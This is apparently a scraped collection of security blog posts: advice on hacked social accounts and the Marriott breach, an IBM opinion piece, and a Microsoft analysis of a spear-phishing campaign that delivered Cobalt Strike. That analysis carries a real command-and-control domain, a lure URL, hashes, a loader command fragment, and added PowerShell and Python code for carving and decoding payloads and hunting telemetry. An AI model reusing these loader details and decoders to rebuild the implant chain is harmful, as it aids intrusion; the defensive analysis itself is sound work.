
These could include your date of birth, address, hometown, or names of family members and pets. Just remember, even if you keep your profile locked down with strong privacy settings, once the hacker logs in as you, everything you have posted is up for grabs.

You should also consider whether the password for the compromised account is being used on any of your other accounts, because if so, you should change those as well. A clever hacker could easily try your email address and known password on a variety of sites to see if they can log in as you, including on banking sites.

Next, you have to address the fact that your account could have been used to spread scams or malware. Hackers often infect accounts so they can profit off clicks using adware, or steal even more valuable information from you and your contacts.

You may have already seen the scam for “discount Ray-Ban” sunglasses that plagued Facebook a couple of years ago, and recently took over Instagram. This piece of malware posts phony ads to the infected user’s account, and then tags their friends in the post. Because the posts appear in a trusted friend’s feed, users are often tricked into clicking on it, which in turn compromises their own account.

So, in addition to warning your contacts not to click on suspicious messages that may have been sent using your account, you should flag the messages as scams to the social media site, and delete them from your profile page.

Finally, you’ll want to check to see if there are any new apps or games installed to your account that you didn’t download. If so, delete them since they may be another attempt to compromise your account.

Now that you know what do to after a social media account is hacked, here’s how to prevent it from happening in the first place.

How To Keep Your Social Accounts Secure

  • Don’t click on suspicious messages or links, even if they appear to be posted by someone you know.
  • Flag any scam posts or messages you encounter on social media to the website, so they can help stop the threat from spreading.
  • Use unique, complicated passwords for all your accounts.
  • If the site offers multi-factor authentication, use it, and choose the highest privacy setting available.
  • Avoid posting any identity information or personal details that might allow a hacker to guess your security questions.
  • Don’t log in to your social accounts while using public Wi-Fi, since these networks are often unsecured and your information could be stolen.
  • Always use comprehensive security software that can keep you protected from the latest threats.
  • Keep up to date on the latest scams and malware threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post What To Do When Your Social Media Account Gets Hacked appeared first on McAfee Blogs.

Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers

Reuters recently reported a hacking campaign focused on a wide range of targets across the globe. In the days leading to the Reuters publication, Microsoft researchers were closely tracking the same campaign.

Our sensors revealed that the campaign primarily targeted public sector institutions and non-governmental organizations like think tanks and research centers, but also included educational institutions and private-sector corporations in the oil and gas, chemical, and hospitality industries.

Microsoft customers using the complete Microsoft Threat Protection solution were protected from the attack. Behavior-based protections in multiple Microsoft Threat Protection components blocked malicious activities and exposed the attack at its early stages. Office 365 Advanced Threat Protection caught the malicious URLs used in emails, driving the blocking of said emails, including first-seen samples. Meanwhile, numerous alerts in Windows Defender Advanced Threat Protection exposed the attacker techniques across the attack chain.

Third-party security researchers have attributed the attack to a threat actor named APT29 or CozyBear, which largely overlaps with the activity group that Microsoft calls YTTRIUM. While our fellow analysts make a compelling case, Microsoft does not yet believe that enough evidence exists to attribute this campaign to YTTRIUM.

Regardless, due to the nature of the victims, and because the campaign features characteristics of previously observed nation-state attacks, Microsoft took the step of notifying thousands of individual recipients in hundreds of targeted organizations. As part of the Defending Democracy Program, Microsoft encourages eligible organizations to participate in Microsoft AccountGuard, a service designed to help these highly targeted customers protect themselves from cybersecurity threats.

Attack overview

The aggressive campaign began early in the morning of Wednesday, November 14. The targeting appeared to focus on organizations that are involved with policy formulation and politics or have some influence in that area.

Phishing targets in different industry verticals

Although targets are distributed across the globe, majority are located in the United States, particularly in and around Washington, D.C. Other targets are in Europe, Hong Kong, India, and Canada.

Phishing targets in different locations

The spear-phishing emails mimicked sharing notifications from OneDrive and, as noted by Reuters, impersonated the identity of individuals working at the United States Department of State. If recipients clicked a link in the spear-phishing emails, they began an exploitation chain that resulted in the implantation of a DLL backdoor that gave the attackers remote access to the recipients' machines.

Attack chain

Analysis of the campaign

Delivery

The spear-phishing emails used in this attack resemble file-sharing notifications from OneDrive.

The emails contain a link to a legitimate, but compromised third-party website:

hxxps://www.jmj.com/personal/nauerthn_state_gov/TUJE7QJl[random string]

The random strings are likely used to identify distinct targeted individuals who clicked on the link. However, all observed variants of this link redirect to a specific link on the same site:

hxxps://www.jmj.com/personal/nauerthn_state_gov/VFVKRTdRSm

When users click the link, they are served a ZIP archive containing a malicious LNK file. All files in a given attack have the same file name, for example, ds7002.pdf, ds7002.zip, and ds7002.lnk.

Installation

The LNK file represents the first stage of the attack. It executes an obfuscated PowerShell command that extracts a base64-encoded payload from within the LNK file itself, starting at offset 0x5e2be and extending for 16,632 bytes.

Encoded content in the LNK file

The encoded payload, another heavily obfuscated PowerShell script, is decoded and executed:

Decoded second script

The second script carves out two additional resources from within the .LNK file:

  • ds7002.PDF (A decoy PDF)
  • cyzfc.dat (The first stage implant)
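The carving step above, as an added analysis helper that is neither the attacker's loader nor Microsoft's code: it reads the base64 blob out of an LNK at the offset and length quoted above and decodes it, and it decodes the $zk='...' command-line fragment that hunting Query 3 further down searches for. The offset, length and fragment are from this analysis; the UTF-16 heuristic, the constructed stand-in LNK and its temp path are assumptions.

```powershell
# Added example, not the attacker's loader nor Microsoft's code: carve and decode
# the base64 blob a malicious LNK hides at a fixed offset, and decode the $zk
# fragment from hunting Query 3. Offset/length and the fragment come from the
# analysis; the UTF-16 heuristic and the synthetic LNK below are assumptions.

function Get-LnkEmbeddedPayload {
    param(
        [Parameter(Mandatory)][string]$Path,
        [int]$Offset = 0x5e2be,   # start of the base64 blob in ds7002.lnk (from the analysis)
        [int]$Length = 16632      # 0x623b6 - 0x5e2be
    )
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    if ($bytes.Length -lt ($Offset + $Length)) {
        throw "$Path is $($bytes.Length) bytes; need at least $($Offset + $Length) to carve."
    }
    $b64 = [System.Text.Encoding]::ASCII.GetString($bytes, $Offset, $Length)
    $b64 = $b64 -replace '[^A-Za-z0-9+/=]', ''            # strip NUL padding and whitespace
    $raw = [Convert]::FromBase64String($b64)
    # Heuristic (assumed): -EncodedCommand style payloads are UTF-16LE, so every second byte is 0.
    if ($raw.Length -ge 2 -and $raw[1] -eq 0) {
        return [System.Text.Encoding]::Unicode.GetString($raw)
    }
    return [System.Text.Encoding]::UTF8.GetString($raw)
}

function ConvertFrom-ZkFragment {
    param([Parameter(Mandatory)][string]$CommandLine)
    # The loader keeps the next stage in  $zk=' <base64>' ; the hunting query
    # carries only a prefix of it, so trim to a multiple of 4 before decoding.
    if ($CommandLine -notmatch '\$zk=''\s*([A-Za-z0-9+/=]+)') { throw 'no $zk fragment in command line' }
    $b64 = $Matches[1]
    $b64 = $b64.Substring(0, $b64.Length - ($b64.Length % 4))
    return [System.Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($b64))
}

# --- runs on constructed data, so no real sample is needed ---

# 1. The command-line prefix that Query 3 below searches for.
$query3 = '-noni -ep bypass $zk='' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0'
ConvertFrom-ZkFragment $query3

# 2. A synthetic "LNK" (constructed): zero padding with a benign UTF-16 script,
#    base64-encoded, placed at a small offset and followed by NUL bytes.
$script = 'Write-Host "stand-in for the second stage"'
$blob   = [System.Text.Encoding]::ASCII.GetBytes([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($script)))
$offset = 0x200
$size   = $offset + $blob.Length + 16
$buffer = New-Object byte[] $size
[Array]::Copy($blob, 0, $buffer, $offset, $blob.Length)
$tmp = Join-Path $env:TEMP 'constructed-sample.lnk'
[System.IO.File]::WriteAllBytes($tmp, $buffer)
Get-LnkEmbeddedPayload -Path $tmp -Offset $offset -Length ($blob.Length + 16)
Remove-Item $tmp
```

The Query 3 fragment decodes to the loader's own variables: the start offset 0x0005e2be and end offset 0x000623b6 of the blob in ds7002.lnk, which is exactly the 16,632-byte span described above, so the hunting query and the carving parameters are the same indicator seen from two sides. Against a real sample, call Get-LnkEmbeddedPayload with the default offset and length.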

Command and control

The first-stage DLL, cyzfc.dat, is created by the PowerShell script in the path %AppData%\Local\cyzfc.dat. It is a 64-bit DLL that exports one function: PointFunctionCall.

The PowerShell script then executes cyzfc.dat by calling rundll32.exe. After connecting to the first-stage command-and-control server at pandorasong[.]com (95.216.59.92), cyzfc.dat begins to install the final payload by taking the following actions:

  1. Allocate a ReadWrite page for the second-stage payload
  2. Extract the second-stage payload as a resource
  3. Take a header of size 0xEF bytes that is baked into the first payload
  4. Concatenate the header with the resource, starting at byte 0x12A
  5. De-XOR the second-stage payload with a rolling XOR (ROR1), starting from key 0xC5

The second stage is an instance of Cobalt Strike, a commercially available penetration testing tool, which performs the following steps:

  1. Define a local named pipe with the format \\.\pipe\MSSE-<number>-server, where <number> is a random number between 0 and 9897
  2. Connect to the pipe and write global data of size 0x3FE00 to it
  3. Implement a backdoor over the named pipe:
    1. Read from the pipe (at most 0x3FE00 bytes) into an allocated buffer
    2. De-XOR the payload into a new RW memory region, this time with a much simpler key: every 4 bytes are XORed with 0x7CC2885F
    3. Change the region's protection to RX
    4. Create a thread that starts running the payload

The step that writes global data to the pipe actually writes a third payload. That payload is XORed with the same algorithm used on the read side. When decrypted, it forms a PE file with a Meterpreter header; the loader interprets instructions in the PE header and passes control to a reflective loader:

The third payload eventually gets loaded and connects to the command-and-control (C&C) server address that is baked-in inside configuration information in the PE file. This configuration information is de-XORed at the third payload runtime:

The configuration information itself mostly contains C&C information:

Cobalt Strike is a feature-rich penetration testing tool that provides remote attackers with a wide range of capabilities, including escalating privileges, capturing user input, executing arbitrary commands through PowerShell or WMI, performing reconnaissance, communicating with C&C servers over various protocols, and downloading and installing additional malware.
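The two XOR layers in the steps above, written out as decoders you can run on carved buffers; this is an added example, not the implant's code or Microsoft's. The DWORD key 0x7CC2885F and the 0xC5 seed are from the analysis. Two things the post does not specify are assumed here: the DWORD key is applied in little-endian byte order, and "rolling XOR (ROR1)" means the 8-bit key is rotated right by one bit after each byte.

```powershell
# Added example, not the implant's code or Microsoft's: the two XOR layers
# described above as reusable decoders. The DWORD key and the 0xC5 seed are
# from the analysis; little-endian key application and the key-update rule for
# the "rolling XOR (ROR1)" (rotate the 8-bit key right by one after every byte)
# are this example's assumptions.

function Unprotect-DwordXor {
    param([Parameter(Mandatory)][byte[]]$Data, [uint32]$Key = 0x7CC2885F)
    $k   = [BitConverter]::GetBytes($Key)      # little-endian bytes, as x64 code reads a DWORD (assumed)
    $out = New-Object byte[] $Data.Length
    for ($i = 0; $i -lt $Data.Length; $i++) {
        $out[$i] = $Data[$i] -bxor $k[$i % 4]   # a trailing partial DWORD is handled byte-wise
    }
    return ,$out
}

function Unprotect-RollingXor {
    param([Parameter(Mandatory)][byte[]]$Data, [byte]$Seed = 0xC5)
    $key = [int]$Seed
    $out = New-Object byte[] $Data.Length
    for ($i = 0; $i -lt $Data.Length; $i++) {
        $out[$i] = $Data[$i] -bxor $key
        $key = (($key -shr 1) -bor (($key -band 1) -shl 7)) -band 0xFF   # ROR1 on 8 bits (assumed rule)
    }
    return ,$out
}

function Test-MzHeader {
    # Success check after decoding: a PE file starts with "MZ" and e_lfanew at
    # offset 0x3C must point inside the buffer.
    param([Parameter(Mandatory)][byte[]]$Data)
    if ($Data.Length -lt 0x40 -or $Data[0] -ne 0x4D -or $Data[1] -ne 0x5A) { return $false }
    $peOffset = [BitConverter]::ToInt32($Data, 0x3C)
    return ($peOffset -gt 0 -and $peOffset + 4 -le $Data.Length)
}

# --- round trip on a constructed buffer: XOR with a data-independent key stream is its own inverse ---
$plain = New-Object byte[] 0x80
$plain[0] = 0x4D; $plain[1] = 0x5A                                   # "MZ"
[Array]::Copy([BitConverter]::GetBytes([int]0x40), 0, $plain, 0x3C, 4) # e_lfanew -> 0x40
$plain[0x40] = 0x50; $plain[0x41] = 0x45                             # "PE\0\0"

$stage3 = Unprotect-DwordXor -Data $plain      # what the named pipe would carry
$stage2 = Unprotect-RollingXor -Data $plain    # what the DLL resource would carry

Test-MzHeader (Unprotect-DwordXor -Data $stage3)     # decoded third stage looks like a PE
Test-MzHeader (Unprotect-RollingXor -Data $stage2)   # decoded second stage looks like a PE
Test-MzHeader $stage3                                # still encoded: not a PE
```

If a real carved resource does not pass Test-MzHeader after Unprotect-RollingXor, the assumed key-update rule is the first thing to revisit: try updating the key from the ciphertext or plaintext byte instead of a pure rotation, and confirm against the 0xEF-byte header the post says is concatenated in front of the resource.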

End-to-end defense through Microsoft Threat Protection

Microsoft Threat Protection is a comprehensive solution for enterprise networks, protecting identities, endpoints, user data, cloud apps, and infrastructure. By integrating Microsoft services, Microsoft Threat Protection facilitates signal sharing and threat remediation across services. In this attack, Office 365 Advanced Threat Protection and Windows Defender Advanced Threat Protection quickly mitigated the threat at the onset through durable behavioral protections.

Office 365 ATP has enhanced phishing protection and coverage against new threats and polymorphic variants. Detonation systems in Office 365 ATP caught behavioral markers in links in the emails, allowing us to successfully block campaign emails, including first-seen samples, and protect targeted customers. Three existing behavior-based detection algorithms quickly determined that the URLs were malicious. In addition, Office 365 ATP uses security signals from Windows Defender ATP, which had a durable behavior-based antivirus detection (Behavior:Win32/Atosev.gen!A) for the second-stage malware. If you are not already secured against advanced cyberthreat campaigns via email, begin a free Office 365 E5 trial today.

Safe Links protection in Office 365 ATP protects customers from attacks like this by analyzing unknown URLs when customers try to open them. Zero-hour Auto Purge (ZAP) actively removes emails post-delivery after they have been verified as malicious; this is often critical in stopping attacks that weaponize embedded URLs after the emails are sent.

All of these protections and signals on the attack entry point are shared with the rest of the Microsoft Threat Protection components. Windows Defender ATP customers would see alerts related to the detection of the malicious emails by Office 365 ATP, as well the behavior-based antivirus detection.

Windows Defender ATP detects known filesystem and network artifacts associated with the attack. In addition, the actions of the LNK file are detected behaviorally. Alerts with the following titles are indicative of this attack activity:

  • Artifacts associated with an advanced threat detected
  • Network activity associated with an advanced threat detected
  • Low-reputation arbitrary code executed by signed executable
  • Suspicious LNK file opened

Network protection blocks connections to malicious domains and IP addresses. The following attack surface reduction rule also blocks malicious activities related to this attack:

  • Block executable files from running unless they meet a prevalence, age, or trusted list criteria

Through Windows Defender Security Center, security operations teams could investigate these alerts and pivot to machines, users, and the new Incidents view to trace the attack end-to-end. Automated investigation and response capabilities, threat analytics, as well as advanced hunting and new custom detections, empower security operations teams to defend their networks from this attack.

To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

The following Advanced hunting queries can help security operations teams search for any related activities within the network:

//Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

//Query 2: C&C connection
NetworkCommunicationEvents 
| where EventTime > ago(10d) 
| where RemoteUrl == "pandorasong.com" 

//Query 3: Malicious PowerShell
ProcessCreationEvents 
| where EventTime > ago(10d) 
| where ProcessCommandLine contains 
"-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0" 

//Query 4: Malicious domain in default browser commandline
ProcessCreationEvents 
| where EventTime > ago(10d) 
| where ProcessCommandLine contains 
"https://www.jmj.com/personal/nauerthn_state_gov" 

//Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

The provided queries check events from the past ten days. Change EventTime to focus on a different period.
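To show what those five queries do against concrete telemetry without a tenant to run them in, here is an added Python walk-through (example code, not part of the original post and not Windows Defender ATP code) that applies the same five conditions to a handful of constructed JSON-lines events. The hashes, domain and URL are the indicators listed further down this page; the hostnames, timestamps, the "Table" field and the reference time used for ago() are assumptions made for the example. Query 3 is deliberately keyed on the PowerShell launch flags rather than the fixed base64 prefix, so that a payload change does not defeat the match.

```python
"""Offline walk-through of the five hunting queries above over constructed events."""
import json
import re
from datetime import datetime, timedelta, timezone

# Indicators copied from the IOC list on this page.
FIRST_STAGE_SHA1 = "9858d5cb2a6614be3c48e33911bf9f7978b441bf"  # cyzfc.dat (Query 1)
ZIP_SHA1 = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1"          # ds7002.ZIP (Query 5)
C2_DOMAIN = "pandorasong.com"                                   # Query 2
LURE_URL = "https://www.jmj.com/personal/nauerthn_state_gov"    # Query 4
# Query 3 matches a fixed prefix of the encoded payload; keying on the launch
# flags instead (non-interactive, execution policy bypassed) survives payload
# changes, at the cost of a second look at each hit.
PS_FLAGS = re.compile(r"-noni\b.*?-ep\s+bypass", re.IGNORECASE)

# Constructed sample events (hypothetical hostnames, times and a "Table" field)
# in a JSON-lines shape loosely modelled on the tables the queries name.
SAMPLE_EVENTS = """\
{"EventTime":"2018-11-14T10:02:11Z","Table":"FileCreationEvents","DeviceName":"ws-17","SHA1":"cd92f19d3ad4ec50f6d19652af010fe07dca55e1","InitiatingProcessSHA1":"","ProcessCommandLine":"","RemoteUrl":""}
{"EventTime":"2018-11-14T10:02:40Z","Table":"ProcessCreationEvents","DeviceName":"ws-17","SHA1":"","InitiatingProcessSHA1":"","ProcessCommandLine":"powershell.exe -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTsk'","RemoteUrl":""}
{"EventTime":"2018-11-14T10:03:05Z","Table":"NetworkCommunicationEvents","DeviceName":"ws-17","SHA1":"","InitiatingProcessSHA1":"9858d5cb2a6614be3c48e33911bf9f7978b441bf","ProcessCommandLine":"","RemoteUrl":"pandorasong.com"}
{"EventTime":"2018-11-14T10:03:07Z","Table":"ProcessCreationEvents","DeviceName":"ws-17","SHA1":"","InitiatingProcessSHA1":"","ProcessCommandLine":"iexplore.exe https://www.jmj.com/personal/nauerthn_state_gov/VFVKRTdRSm","RemoteUrl":""}
{"EventTime":"2018-10-01T08:00:00Z","Table":"NetworkCommunicationEvents","DeviceName":"ws-03","SHA1":"","InitiatingProcessSHA1":"","ProcessCommandLine":"","RemoteUrl":"pandorasong.com"}
{"EventTime":"2018-11-14T11:00:00Z","Table":"ProcessCreationEvents","DeviceName":"ws-22","SHA1":"","InitiatingProcessSHA1":"","ProcessCommandLine":"powershell.exe -NoProfile -Command Get-Date","RemoteUrl":""}
"""
SAMPLE_NOW = datetime(2018, 11, 20, tzinfo=timezone.utc)  # hypothetical "now" for ago()


def parse_time(stamp):
    """ISO-8601 'Z' timestamp to an aware datetime."""
    return datetime.fromisoformat(stamp.replace("Z", "+00:00"))


def hunt(jsonl, now=SAMPLE_NOW, window=timedelta(days=10)):
    """Return one finding per (query, event) match inside the window, oldest first."""
    cutoff = now - window  # mirrors '| where EventTime > ago(10d)'
    findings = []
    for raw in jsonl.splitlines():
        if not raw.strip():
            continue
        ev = json.loads(raw)
        if parse_time(ev["EventTime"]) <= cutoff:
            continue
        table = ev["Table"]
        hashes = {ev.get("SHA1", ""), ev.get("InitiatingProcessSHA1", "")}
        cmd = ev.get("ProcessCommandLine", "")
        hits = []
        # Query 1: any table, the file or its initiating process is the DLL container
        if FIRST_STAGE_SHA1 in hashes:
            hits.append("Q1 dll-container")
        # Query 2: outbound connection to the first-stage C&C domain
        if table == "NetworkCommunicationEvents" and ev.get("RemoteUrl") == C2_DOMAIN:
            hits.append("Q2 c2-connection")
        # Query 3: PowerShell launched with the loader's flags
        if table == "ProcessCreationEvents" and PS_FLAGS.search(cmd):
            hits.append("Q3 powershell")
        # Query 4: the lure URL handed to the default browser
        if table == "ProcessCreationEvents" and LURE_URL in cmd:
            hits.append("Q4 lure-url")
        # Query 5: any table, the ZIP container
        if ZIP_SHA1 in hashes:
            hits.append("Q5 zip")
        for hit in hits:
            findings.append({"query": hit, "time": ev["EventTime"],
                             "device": ev["DeviceName"], "table": table})
    findings.sort(key=lambda f: f["time"])  # uniform ISO timestamps sort lexically
    return findings


def devices_hit(findings):
    """Distinct devices to pivot on, the way the Incidents view groups alerts."""
    return sorted({f["device"] for f in findings})


def run_sample(window_days=10):
    """Run the constructed events through the five queries with a given look-back."""
    return hunt(SAMPLE_EVENTS, SAMPLE_NOW, timedelta(days=window_days))


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f['time']}  {f['device']:<6} {f['table']:<28} {f['query']}")
    print("devices:", devices_hit(run_sample()))
```

With the default ten-day window the older pandorasong.com connection from ws-03 is dropped, exactly as ago(10d) would drop it; widening the look-back to sixty days brings it back and adds a second device to pivot on. The benign PowerShell invocation on ws-22 never matches, because it lacks the -noni / -ep bypass flags.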

Windows Defender Research team, Microsoft Threat Intelligence Center, and Office 365 ATP research team

Indicators of attack

Files (SHA-1)

  • ds7002.ZIP: cd92f19d3ad4ec50f6d19652af010fe07dca55e1
  • ds7002.LNK: e431261c63f94a174a1308defccc674dabbe3609
  • ds7002.PDF (decoy PDF): 8e928c550e5d44fb31ef8b6f3df2e914acd66873
  • cyzfc.dat (first-stage): 9858d5cb2a6614be3c48e33911bf9f7978b441bf

URLs

  • hxxps://www.jmj[.]com/personal/nauerthn_state_gov/VFVKRTdRSm

C&C servers

  • pandorasong[.]com (95.216.59.92) (first-stage C&C server)

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers appeared first on Microsoft Secure.

Fight Evolving Cybersecurity Threats With a One-Two-Three Punch

When I became vice president and general manager for IBM Security North America, the staff gave me an eye-opening look at the malicious hackers who are infiltrating everything from enterprises to government agencies to political parties. The number of new cybersecurity threats is distressing, doubling from four to eight new malware samples per second between the third and fourth quarters of 2017, according to McAfee Labs.

Yet that inside view only increased my desire to help security professionals fulfill their mission of securing organizations against cyberattacks through client and industry partnerships, advanced technologies such as artificial intelligence (AI), and incident response (IR) training on the cyber range.

Cybersecurity Is Shifting From Prevention to Remediation

Today, the volume of threats is so overwhelming that getting ahead is often unrealistic. It’s not a matter of if you’ll have a breach, it’s a matter of when — and how quickly you can detect and resolve it to minimize damage. With chief information security officers (CISOs) facing a shortage of individuals with the necessary skills to design environments and fend off threats, the focus has shifted from prevention to remediation.

To identify the areas of highest risk, just follow the money to financial institutions, retailers and government entities. Developed countries also face greater risks. The U.S. may have advanced cybersecurity technology, for example, but we also have assets that translate into greater payoffs for attackers.

Remediation comes down to visibility into your environment that allows you to notice not only external threats, but internal ones as well. In fact, internal threats create arguably the greatest vulnerabilities. Users on the inside know where the networks, databases and critical information are, and often have access to areas that are seldom monitored.

Bring the Power of Partnerships to Bear

Once you identify a breach, you’ll typically have minutes or even seconds to quarantine it and remediate the damage. You need to be able to leverage the data available and make immediate decisions. Yet frequently, the tools that security professionals use aren’t appropriately implemented, managed, monitored or tuned. In fact, 44 percent of organizations lack an overall information security strategy, according to PwC’s “The Global State of Information Security Survey 2018.”

Organizations are beginning to recognize that they cannot manage cybersecurity threats alone. You need a partner that can aggregate data from multiple clients and make that information accessible to everyone, from customers to competitors, to help prevent breaches. It’s like the railroad industry: Union Pacific, BNSF and CSX may battle for business, but they all have a vested interest in keeping the tracks safe, no matter who is using them.

Harden the Expanding Attack Surface

Along with trying to counteract increasingly sophisticated threats, enterprises must also learn how to manage the data coming from a burgeoning number of Internet of Things (IoT) devices. This data improves our lives, but the devices give attackers even more access points into the corporate environment. That’s where technology that manages a full spectrum of challenges comes into play. IBM provides an immune system for security from threat intelligence to endpoint management, with a host of solutions that harden your organization.

Even with advanced tools, analysts don’t always have enough hours in the day to keep the enterprise secure. One solution is incorporating automation and AI into the security operations center (SOC). We layer IBM Watson on top of our cybersecurity solutions to analyze data and make recommendations. And as beneficial as AI might be on day one, it delivers even more value as it learns from your data. With increasing threats and fewer resources, any automation you can implement in your cybersecurity environment helps get the work done faster and smarter.

Make Incident Response Like Muscle Memory

I mentioned malicious insider threats, but users who don’t know their behavior creates vulnerabilities are equally dangerous — even if they have no ill intent. At IBM, for example, we no longer allow the use of thumb drives since they’re an easy way to compromise an organization. We also train users from myriad organizations on how to react to threats, such as phishing scams or bogus links, so that their automatic reaction is the right reaction.

This is even more critical for incident response. We practice with clients just like you’d practice a golf swing. By developing that muscle memory, it becomes second nature to respond in the appropriate way. If you’ve had a breach in which the personally identifiable information (PII) of 100,000 customers is at risk — and the attackers are demanding payment — what do you say? What do you do? Just like fire drills, you must practice your IR plan.

Additionally, security teams need training to build discipline and processes, react appropriately and avoid making mistakes that could cost the organization millions of dollars. Response is not just a cybersecurity task, but a companywide communications effort. Everyone needs to train regularly to know how to respond.

Check out the IBM X-Force Command Cyber Tactical Operations Center (C-TOC)

Fighting Cybersecurity Threats Alongside You

IBM considers cybersecurity a strategic imperative and, as such, has invested extensive money and time in developing a best-of-breed security portfolio. I’m grateful for the opportunity to put it to work to make the cyber world a safer place. As the leader of the North American security unit, I’m committed to helping you secure your environments and achieve better business outcomes.

The post Fight Evolving Cybersecurity Threats With a One-Two-Three Punch appeared first on Security Intelligence.

Sharp rise in email and social media hacking in the UK

Police forces across the UK are coming under increasing pressure to launch criminal investigations into incidents of social media and computer hacking, according to a new report from the Parliament Street think tank. The news comes as senior Police Chiefs have warned that budget cuts and limited resources are leading to an increase in violent crime across the country. The new research paper, reveals that 14 police forces have launched a total of 2,547 investigations … More

The post Sharp rise in email and social media hacking in the UK appeared first on Help Net Security.

Half a billion Marriott guests affected by a large-scale data breach

On Friday, Marriott International Inc. announced that over the last few years its Starwood properties have been exposing sensitive information belonging to hundreds of millions of customers. It is believed that the details of nearly 500 million Marriott guests have been accessed by cyber criminals. The leaked data includes guest information such as name, passport number, mailing address, gender, phone number, email address, date of birth, and reservation dates. Marriott highlighted that for some guests the leaked information also includes payment card numbers and payment card expiration dates. The incident will go down in history as one of the largest data breaches ever.

Starwood, which Marriott acquired in 2016, has more than 1,200 locations across the globe and includes brands such as Westin, Sheraton, The Luxury Collection, Four Points by Sheraton, W Hotels, St. Regis, Le Méridien, Aloft, Element, Tribute Portfolio, and Design Hotels.

Marriott said that on November 19th the company confirmed that there had been unauthorized access to Starwood's guest reservation database. The unauthorized access may have started as early as 2014 and was not discovered until September 2018. It is currently unknown who is behind the attack and whether the stolen data has ever been offered for sale on the dark web. There is no evidence showing whether the attack was state-driven or the work of financially motivated criminals.

Marriott is sending emails on a rolling basis to every address found in the affected database and is offering free one-year identity-theft protection to everyone who might have been affected by the breach. The hotel chain is cooperating with the authorities and has opened a hotline for concerned customers.

What to do if you’ve been affected?

First and foremost, consider taking advantage of the free identity-theft protection service offered by Marriott. Next, go through your bank statements and look for suspicious activity. If you notice something out of the ordinary, call your card issuer and discuss your concerns with them; most banks will overnight you a replacement card.

Then keep an eye on your credit report and consider freezing your credit with all three major bureaus: Equifax, Experian, and TransUnion. If you are not planning to apply for credit anytime soon, a freeze is strongly suggested, since it prevents anyone from using the stolen data to open new accounts in your name.

If you do not have antivirus software on all your connected devices, consider installing it. A single breach rarely gives fraudsters everything they need to steal an identity or empty an account, so they go after the victims again, for example with phishing that uses the stolen details, to fill in the missing pieces. Quality antivirus software on every device makes that follow-up harder. Don't make it easy for them.

Last but not least, you may consider joining one of the class-action lawsuits that started appearing after the news broke on Friday. Two people from Oregon filed a lawsuit against the hotel chain within hours of Marriott's announcement, and a law firm based in Maryland followed with another. Expect more class-action suits to be filed in the coming months.

The Marriott breach will go down in history as one of the most significant hacks to date. The Yahoo breach of 2013-2014 still tops the list, with roughly 3 billion accounts affected, but Marriott's breach certainly makes the top five largest data breaches in the world. It may also end up being one of the costliest, since it was announced months after GDPR came into force, which exposes the hospitality chain to a potentially hefty fine.

The post Half a billion Marriott guests affected by a large-scale data breach appeared first on Panda Security Mediacenter.

Detecting malicious behavior blended with business-justified activity

With organizations moving to the cloud and remote workers becoming the rule rather than the exception, the definition of the network is changing. Add to this the increasing use of IoT devices, encryption and engagement in shadow IT practices, and it’s easy to see why organizations have trouble keeping their network and systems secure. What’s more, attackers are changing tactics: they are relying less and less on malware and shifting their focus to stealing legitimate … More

The post Detecting malicious behavior blended with business-justified activity appeared first on Help Net Security.

Making it harder for attackers to know when a system begins to deceive a bad actor

Can you deceive a deceiver? That’s the question that computer scientists at Binghamton University, State University of New York have recently been exploring. Assistant Professor of Computer Science Guanhua Yan and PhD student Zhan Shu are looking at how to make cyber deception a more effective tool against malicious hackers. Their study was inspired by the 2013 Target data breach that affected 41 million consumers and cost Target $18.5 million, and the 2017 Equifax hack … More

The post Making it harder for attackers to know when a system begins to deceive a bad actor appeared first on Help Net Security.

Best practice methodology for industrial network security: SEC-OT

Secure Operations Technology (SEC-OT) is a methodology and collection of best practices inspired by a decade of experience working with secure industrial sites. The SEC-OT approach is counter-intuitive to many IT and even industrial control system (ICS) security practitioners. It turns out that secure industrial sites ask different questions and get different answers. For example, industrial sites generally do not ask "how can we protect our information?" Instead, they ask, "how do we keep the … More

The post Best practice methodology for industrial network security: SEC-OT appeared first on Help Net Security.

IIoT technologies integration creates expansion opportunities in the industrial cybersecurity industry

High penetration of Industrial Internet of Things (IIoT) technology in critical infrastructure and the manufacturing sector has resulted in a growing number of potential cyber-attack surfaces. According to a recent analysis from Frost & Sullivan, cyber-attacks within the energy and utilities industries alone cost an average of $13.2 million per year. These rising incidences of cyber-attacks, coupled with evolving compliance regulations by governments, and increased awareness among mature and less mature markets have accelerated the … More

The post IIoT technologies integration creates expansion opportunities in the industrial cybersecurity industry appeared first on Help Net Security.

What Type of Vulnerabilities Does a Penetration Test Look For?

